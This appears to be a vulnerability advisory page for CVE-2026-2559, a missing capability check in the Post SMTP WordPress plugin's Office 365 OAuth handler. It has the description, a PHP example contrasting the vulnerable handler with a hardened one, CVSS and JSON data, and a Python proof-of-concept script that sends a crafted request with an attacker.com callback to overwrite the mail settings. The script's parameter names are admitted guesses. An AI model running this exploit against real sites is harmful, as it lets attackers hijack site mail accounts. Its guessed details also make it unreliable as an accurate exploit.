Security Vulnerability Report
CVE-2026-2559 CVSS 5.3 MEDIUM

Published: 2026-03-18 16:16:27
Last Modified: 2026-04-22 21:32:08

Description

The Post SMTP plugin for WordPress is vulnerable to unauthorized modification of data (CWE-862, missing authorization) due to a missing capability check on the `handle_office365_oauth_redirect()` function in all versions up to, and including, 3.8.0. The function is hooked to `admin_init` without any `current_user_can()` check or nonce verification, so any authenticated user with Subscriber-level access or above can overwrite the site's Office 365 OAuth mail configuration (access token, refresh token, and user email) via a crafted URL. That configuration is read during the Microsoft 365 SMTP setup wizard, which is only available in the Pro version of the plugin. An Administrator could therefore mistake an attacker-controlled Azure app for their own and connect the plugin to the attacker's account while configuring it after upgrading to Pro.
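The shape of the bug, and the fix a reviewer would ask for, as an added example that is not code from the Post SMTP plugin or from the advisory. The `admin_init` hook fires on every wp-admin request made by a logged-in user (including `admin-ajax.php` and `admin-post.php`), so a handler registered there with no capability check is reachable by a Subscriber who simply loads a crafted wp-admin URL. Every function, option and query-parameter name below is an assumption for illustration; the real names live in `Postman/Wizard/NewWizard.php` (see References).

```php
<?php
/**
 * Added example, not Post SMTP's own code: the CWE-862 pattern described in
 * CVE-2026-2559 (state-changing handler on admin_init, no capability check,
 * no nonce) next to a hardened version of the same handler.
 * All names prefixed example_ are assumptions made for illustration.
 */

// --- BEFORE (vulnerable shape) ------------------------------------------
// Any logged-in user who requests a wp-admin URL carrying the assumed
// parameters reaches this function and overwrites the stored OAuth config.
function example_office365_oauth_redirect_vulnerable() {
	if ( empty( $_GET['example_o365_code'] ) ) { // assumed parameter name
		return;
	}
	$opts                  = get_option( 'example_o365_oauth', array() ); // assumed option name
	$opts['access_token']  = sanitize_text_field( wp_unslash( $_GET['example_o365_code'] ) );
	$opts['refresh_token'] = sanitize_text_field( wp_unslash( $_GET['example_o365_refresh'] ?? '' ) );
	$opts['user_email']    = sanitize_email( wp_unslash( $_GET['example_o365_email'] ?? '' ) );
	update_option( 'example_o365_oauth', $opts );
}
// add_action( 'admin_init', 'example_office365_oauth_redirect_vulnerable' ); // the vulnerable registration

// --- AFTER (hardened) ---------------------------------------------------
const EXAMPLE_O365_NONCE_ACTION = 'example_o365_oauth_connect';

// The authorization URL the wizard sends the admin to. The nonce travels in
// the OAuth "state" parameter, so on return only a redirect that completes a
// flow this site started for this user is accepted. add_query_arg() does not
// encode values, hence the explicit rawurlencode().
function example_office365_authorize_url( $client_id, $redirect_uri ) {
	return add_query_arg(
		array(
			'client_id'     => rawurlencode( $client_id ),
			'response_type' => 'code',
			'redirect_uri'  => rawurlencode( $redirect_uri ),
			'scope'         => rawurlencode( 'offline_access https://outlook.office.com/SMTP.Send' ),
			'state'         => wp_create_nonce( EXAMPLE_O365_NONCE_ACTION ),
		),
		'https://login.microsoftonline.com/common/oauth2/v2.0/authorize'
	);
}

function example_office365_oauth_redirect_hardened() {
	if ( empty( $_GET['example_o365_code'] ) ) {
		return;
	}
	// 1. Capability check (the missing CWE-862 control): only users allowed
	//    to change site options may touch the mail configuration.
	if ( ! current_user_can( 'manage_options' ) ) {
		wp_die( esc_html__( 'You are not allowed to change mail settings.' ), 403 );
	}
	// 2. Nonce check: "state" must be a nonce this site issued to the current
	//    user, which also defeats a crafted URL handed to an admin (CSRF).
	$state = isset( $_GET['state'] ) ? sanitize_text_field( wp_unslash( $_GET['state'] ) ) : '';
	if ( ! wp_verify_nonce( $state, EXAMPLE_O365_NONCE_ACTION ) ) {
		wp_die( esc_html__( 'Invalid OAuth state.' ), 403 );
	}
	// 3. Only now is the returned data stored.
	$opts                  = get_option( 'example_o365_oauth', array() );
	$opts['access_token']  = sanitize_text_field( wp_unslash( $_GET['example_o365_code'] ) );
	$opts['refresh_token'] = sanitize_text_field( wp_unslash( $_GET['example_o365_refresh'] ?? '' ) );
	$opts['user_email']    = sanitize_email( wp_unslash( $_GET['example_o365_email'] ?? '' ) );
	update_option( 'example_o365_oauth', $opts );
}
add_action( 'admin_init', 'example_office365_oauth_redirect_hardened' );
```

Both checks are needed: the capability check alone still lets an attacker drive the handler by sending an Administrator a crafted URL, and the nonce alone does not stop a Subscriber who generated the nonce for their own session. Binding the nonce to the OAuth `state` value is the usual way to get CSRF protection on an OAuth callback, since the identity provider echoes `state` back unchanged.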

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

No CPE configuration data is available for this record. The affected range stated in the advisory is:

Post SMTP plugin for WordPress <= 3.8.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import sys

import requests

# CVE-2026-2559 PoC - Post SMTP Office365 OAuth Configuration Hijacking
# Target: WordPress site with Post SMTP plugin <= 3.8.0
# Author: Generated PoC
#
# Caveat: the 'action' name and the other query parameters below are this
# PoC's assumptions, not values taken from the advisory or the plugin source.
# Confirm the real parameter names against Postman/Wizard/NewWizard.php
# (see References) before relying on them.


def exploit_oauth_redirect(target_url, attacker_callback_url, cookie_header=None):
    """
    Exploit the missing capability check in handle_office365_oauth_redirect().
    This allows authenticated users (Subscriber and above) to overwrite the
    Office 365 OAuth config. `cookie_header` is the raw Cookie header of a
    logged-in WordPress session for such a user.
    """
    # Craft the malicious OAuth redirect URL.
    # The function is hooked to admin_init without nonce verification.
    exploit_params = {
        'action': 'post_smtp_office365_oauth_redirect',  # assumed name
        'code': 'attacker_access_token_or_authorization_code',
        'state': 'attacker_session_state',
        'redirect_uri': attacker_callback_url,
    }

    # Target the admin-post.php endpoint, which fires admin_init.
    exploit_url = f"{target_url.rstrip('/')}/wp-admin/admin-post.php"

    print(f"[*] Target: {target_url}")
    print(f"[*] Exploit URL: {exploit_url}")
    print("[*] Sending crafted request...")

    # Send the exploit request. The advisory requires an authenticated
    # Subscriber+ session, so the request carries that session's cookies.
    headers = {'Cookie': cookie_header} if cookie_header else {}
    response = requests.get(
        exploit_url,
        params=exploit_params,
        headers=headers,
        allow_redirects=False,
        timeout=15,
    )

    print(f"[*] Response Status: {response.status_code}")
    # A 200/302 only shows the request was accepted; whether the stored
    # option actually changed has to be confirmed on the target.
    if response.status_code in (200, 302):
        print("[+] Request sent successfully")
        print("[+] OAuth configuration may have been overwritten")
        print("[+] Next: Wait for admin to configure Pro version SMTP")
        print("[+] Admin will unknowingly connect to attacker's Azure app")
    else:
        print("[-] Exploit failed")
    return response


if __name__ == "__main__":
    if len(sys.argv) < 3:
        print(f"Usage: python {sys.argv[0]} <target_url> <attacker_callback_url> [cookie_header]")
        print(f"Example: python {sys.argv[0]} http://victim.com https://attacker.com/callback "
              "'wordpress_logged_in_abc=...'")
        sys.exit(1)
    target = sys.argv[1]
    callback = sys.argv[2]
    cookie = sys.argv[3] if len(sys.argv) > 3 else None
    exploit_oauth_redirect(target, callback, cookie)

References

https://plugins.trac.wordpress.org/browser/post-smtp/trunk/Postman/Wizard/NewWizard.php#L104
https://plugins.trac.wordpress.org/browser/post-smtp/trunk/Postman/Wizard/NewWizard.php#L2109
https://plugins.trac.wordpress.org/changeset/3484515/
https://www.wordfence.com/threat-intel/vulnerabilities/id/323436b5-fbfe-4923-8b08-93c1fcabc016?source=cve

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-2559",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-18T16:16:27.217",
    "lastModified": "2026-04-22T21:32:08.360",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Post SMTP plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the `handle_office365_oauth_redirect()` function in all versions up to, and including, 3.8.0. This is due to the function being hooked to `admin_init` without any `current_user_can()` check or nonce verification. This makes it possible for authenticated attackers, with Subscriber-level access and above, to overwrite the site's Office 365 OAuth mail configuration (access token, refresh token, and user email) via a crafted URL. The configuration option is used during wizard setup of Microsoft365 SMTP, only available in the Pro option of the plugin. This could cause an Administrator to believe an attacker-controlled Azure app is their own, and lead them to connect the plugin to the attacker's account during configuration after upgrading to Pro."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.6,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-862"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/post-smtp/trunk/Postman/Wizard/NewWizard.php#L104",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/post-smtp/trunk/Postman/Wizard/NewWizard.php#L2109",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/changeset/3484515/",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/323436b5-fbfe-4923-8b08-93c1fcabc016?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}